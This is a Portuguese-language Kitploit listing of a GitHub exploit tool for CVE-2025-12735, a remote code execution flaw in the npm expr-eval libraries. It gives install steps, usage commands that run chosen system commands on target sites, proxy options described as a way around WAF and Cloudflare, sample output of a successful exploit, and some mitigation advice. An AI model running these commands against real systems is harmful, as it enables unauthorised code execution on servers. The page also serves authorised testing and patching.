Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-12735-expr-eval-rce — Ferramenta de pesquisa de segurança para detectar e testar a CVE-2025-12735 (expr-eval RCE vulnerability) | Kitploit
Ferramentas/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

Ferramenta de pesquisa de segurança para detectar e testar a CVE-2025-12735 (expr-eval RCE vulnerability)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
11há 9 mesesAinda não revisado
Compartilhar

Exploit RCE CVE-2025-12735 expr-eval

Uma ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-12735 nos pacotes npm expr-eval e expr-eval-fork.

⚠️ Aviso Legal

Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em sistemas próprios ou com permissão explícita por escrito para testar.

📋 Visão Geral

CVE-2025-12735 é uma vulnerabilidade crítica de Execução Remota de Código nos pacotes npm expr-eval e expr-eval-fork. Essa vulnerabilidade permite que atacantes definam funções arbitrárias dentro do objeto context usado pelo parser, possibilitando a injeção de código malicioso que executa comandos a nível de sistema.

Pontuação CVSS: 9.8 (Crítico)
Versões Afetadas: expr-eval-fork < 3.0.0
expr-eval-fork v3.0.0+

Versão Corrigida:

🔍 Funcionalidades

  • Detecção Automatizada: Escaneia o uso da biblioteca expr-eval em arquivos JavaScript
  • Descoberta de Endpoints: Encontra automaticamente endpoints de avaliação
  • Teste de Vulnerabilidade: Testa a vulnerabilidade CVE-2025-12735
  • Execução de Comandos: Demonstra capacidade de RCE (para testes autorizados)
  • Suporte a Multithreading: Escaneie vários alvos em paralelo
  • Suporte a Proxy: Contorne restrições WAF/Cloudflare
  • Exportação JSON: Resultados detalhados em formato JSON

📦 Instalação

Pré-requisitos

  • Python 3.6 ou superior
  • pip (gerenciador de pacotes Python)

Instalação Rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

Alternativa: Download Direto

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Install dependencies
pip install requests

🚀 Uso

Uso Básico

root@kitploit:~
# Alvo único
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Executar comando personalizado
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Múltiplos alvos a partir de arquivo
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# Com threading para escaneamento mais rápido
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Saída detalhada para depuração
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

Usando Proxies

root@kitploit:~
# Proxy único
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Múltiplos proxies a partir de arquivo
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

Opções da Linha de Comando

root@kitploit:~
-u, --url          URL do alvo
-f, --file         Arquivo contendo URLs de alvo (um por linha)
-c, --command      Comando a executar (padrão: id)
-t, --threads      Número de threads (padrão: 1)
-o, --output       Arquivo de saída (padrão: uknf_expr_eval_results.json)
-v, --verbose      Ativar registro detalhado
--proxy            URL do proxy (ex.: http://127.0.0.1:8080)
--proxy-list       Arquivo contendo URLs de proxy (um por linha)

📊 Saída

O script gera um arquivo JSON com resultados detalhados:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 Como Funciona

  1. Fase de Detecção: Escaneia arquivos JavaScript e conteúdo HTML em busca de referências expr-eval
  2. Descoberta de Endpoints: Testa endpoints comuns de API que podem usar expr-eval
  3. Teste de Vulnerabilidade: Tenta injetar funções arbitrárias no objeto context
  4. Exploração: Se vulnerável, demonstra capacidade de RCE

🛡️ Mitigação

Se você está usando expr-eval ou expr-eval-fork:

  1. Atualize imediatamente:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. Aplique o patch de segurança:

    • Aplique o Pull Request #288 ao expr-eval
    • Ou mude para expr-eval-fork v3.0.0+
  3. Implemente validação de entrada:

    • Sanitize todas as entradas do usuário
    • Use lista de permissões de funções
    • Valide objetos context

📚 Referências

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • Aviso do GitHub: GHSA-jc85-fpwf-qm7x
  • Patch de Segurança: PR #288

📖 Exemplos

Exemplo 1: Escaneamento de Alvo Único

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

Exemplo 2: Múltiplos Alvos com Saída

root@kitploit:~
# Cria arquivo de alvos
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Executar escaneamento
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

Exemplo 3: Execução de Comando Personalizado

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

Exemplo 4: Usando Proxies

root@kitploit:~
# Proxy único
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Múltiplos proxies a partir de arquivo
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 Contribuindo

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

  1. Faça um fork do repositório
  2. Crie sua branch de funcionalidade (git checkout -b feature/AmazingFeature)
  3. Commit suas alterações (git commit -m 'Add some AmazingFeature')
  4. Envie para a branch (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

🐛 Problemas

Se encontrar algum problema ou tiver sugestões, por favor abra uma issue no GitHub.

📝 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

⭐ Histórico de Estrelas

Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!

⚖️ Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado. Os autores não são responsáveis por qualquer uso indevido ou danos causados por este programa. Os usuários são responsáveis por garantir que tenham a devida autorização antes de testar qualquer sistema.

🙏 Agradecimentos

  • Relator original da vulnerabilidade: Jangwoo Choe (UKO)
  • Centro de Coordenação CERT pela divulgação da vulnerabilidade
  • Segurança do GitHub e npm pelos avisos de segurança

💰 Doações

Se você achar esta ferramenta útil e gostaria de apoiar o projeto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Obrigado pelo seu apoio! 🙏

Baixar ferramenta